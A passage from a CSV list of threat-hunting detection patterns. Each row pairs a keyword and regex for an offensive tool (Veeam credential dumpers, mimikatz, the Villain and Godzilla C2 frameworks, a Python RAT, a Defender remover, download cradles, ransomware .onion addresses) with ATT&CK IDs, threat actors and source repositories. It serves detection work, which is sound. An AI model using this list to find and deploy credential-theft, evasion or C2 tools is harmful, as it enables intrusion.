tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62163" "*veeam-creds-main*",".{0,1000}veeam\-creds\-main.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62164" "*Veeam-Get-Creds.ps1*",".{0,1000}Veeam\-Get\-Creds\.ps1.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62165" "*VeeamGetCreds.yaml*",".{0,1000}VeeamGetCreds\.yaml.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62166" "*VeeamHax_TemporaryKey.pfx*",".{0,1000}VeeamHax_TemporaryKey\.pfx.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","1","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","62167" "*veeampot.py*",".{0,1000}veeampot\.py.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from 
Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","62168" "*Vegile -*",".{0,1000}Vegile\s\-.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your specific process. unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a process which while run another process. So we can assume that this process is unstoppable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","0","N/A","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","62169" "*Venom Admin Node Start*",".{0,1000}Venom\sAdmin\sNode\sStart.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","62170" "*Venom\agent\agent.go*",".{0,1000}Venom\\agent\\agent\.go.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","62171" "*venv wapiti3*",".{0,1000}venv\swapiti3.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","62172" 
"*veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion*",".{0,1000}veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62173" "*Verified Merlin server *",".{0,1000}Verified\sMerlin\sserver\s.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","62174" "*verovaleros/domain_analyzer*",".{0,1000}verovaleros\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","62175" "*version %defenderremoverver%*",".{0,1000}version\s\%defenderremoverver\%.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","62176" "*vh.4everproxy.com/secure/*",".{0,1000}vh\.4everproxy\.com\/secure\/.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - 
TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","this pattern could be observed in any proxied site","6","10","N/A","N/A","N/A","N/A","62177" "*victim_host_generator.py*",".{0,1000}victim_host_generator\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","62178" "*VID_03EB&PID_2403*",".{0,1000}VID_03EB\&PID_2403\s.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool ","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","#deviceid","can appear in windows eventid 6416","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z","62179" "*VID_0483&PID_5740*",".{0,1000}VID_0483\&PID_5740.{0,1000}","offensive_tool_keyword","FlipperZero","Flipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","#deviceid","can appear in windows eventid 6416","10","10","N/A","N/A","N/A","N/A","62180" "*Viedx765valdi\\Usedx765er Data*",".{0,1000}Viedx765valdi\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara 
scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62181" "*viewdns-get-rootdomains-ip-ns *",".{0,1000}viewdns\-get\-rootdomains\-ip\-ns\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","62182" "*viewdns-get-rootdomains-whois *",".{0,1000}viewdns\-get\-rootdomains\-whois\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","62183" "*Villain.git*",".{0,1000}Villain\.git.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62185" "*Villain/Core*",".{0,1000}Villain\/Core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62186" "*villain_core.py*",".{0,1000}villain_core\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62187" "*vil-proxy/quickcert*",".{0,1000}vil\-proxy\/quickcert.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","62188" "*vincent.letoux@gmail.com*",".{0,1000}vincent\.letoux\@gmail\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","#email","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62192" "*vip.youwe.shell.core.shell*",".{0,1000}vip\.youwe\.shell\.core\.shell.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62193" "*vip.youwe.shell.shells.payloads.java*",".{0,1000}vip\.youwe\.shell\.shells\.payloads\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - 
T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62194" "*vip.youwe.shell.shells.plugins.java*",".{0,1000}vip\.youwe\.shell\.shells\.plugins\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62195" "*viper/*.sock*",".{0,1000}viper\/.{0,1000}\.sock.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62196" "*viper-dev.conf*",".{0,1000}viper\-dev\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62197" "*viperpython-dev*",".{0,1000}viperpython\-dev.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","62198" "*viperpython-main*",".{0,1000}viperpython\-main.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","62199" "*viperzip.exe*",".{0,1000}viperzip\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","62200" "*Viral - Rat By 
Sameed.exe*",".{0,1000}Viral\s\-\sRat\sBy\sSameed\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62201" "*VirTool:PowerShell/Scanpatch.A*",".{0,1000}VirTool\:PowerShell\/Scanpatch\.A.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","62212" "*VirtualAlllocEx/Payload-Download-Cradles*",".{0,1000}VirtualAlllocEx\/Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","62220" "*virtual-host-enumeration.py*",".{0,1000}virtual\-host\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62221" "*VirtualShell - PoC to create virtual account 
process*",".{0,1000}VirtualShell\s\-\sPoC\sto\screate\svirtual\saccount\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62222" "*viRu5/GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\/GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62223" "*viRu5\GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\\GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62224" "*virusscan_bypass.rb*",".{0,1000}virusscan_bypass\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62225" "*VirusTotalC2.*",".{0,1000}VirusTotalC2\..{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. useful for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. 
now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","62226" "*Visual-Studio-BOF-template*",".{0,1000}Visual\-Studio\-BOF\-template.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","62227" 
"*VITE_STRIKER_API*",".{0,1000}VITE_STRIKER_API.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","62228" "*ViziosDe/MDExclusionParser*",".{0,1000}ViziosDe\/MDExclusionParser.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","62231" "*vkvsgl7lhipjirmz6j5ubp3w3bwvxgcdbpi3fsbqngfynetqtw4w5hyd.onion*",".{0,1000}vkvsgl7lhipjirmz6j5ubp3w3bwvxgcdbpi3fsbqngfynetqtw4w5hyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62232" "*vletoux/MakeMeEnterpriseAdmin*",".{0,1000}vletoux\/MakeMeEnterpriseAdmin.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62233" 
"*vletoux/NTLMInjector*",".{0,1000}vletoux\/NTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","62234" "*VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc*",".{0,1000}VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62235" 
"*Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY*",".{0,1000}Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62236" "*VMSA-2023-0001.py*",".{0,1000}VMSA\-2023\-0001\.py.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting 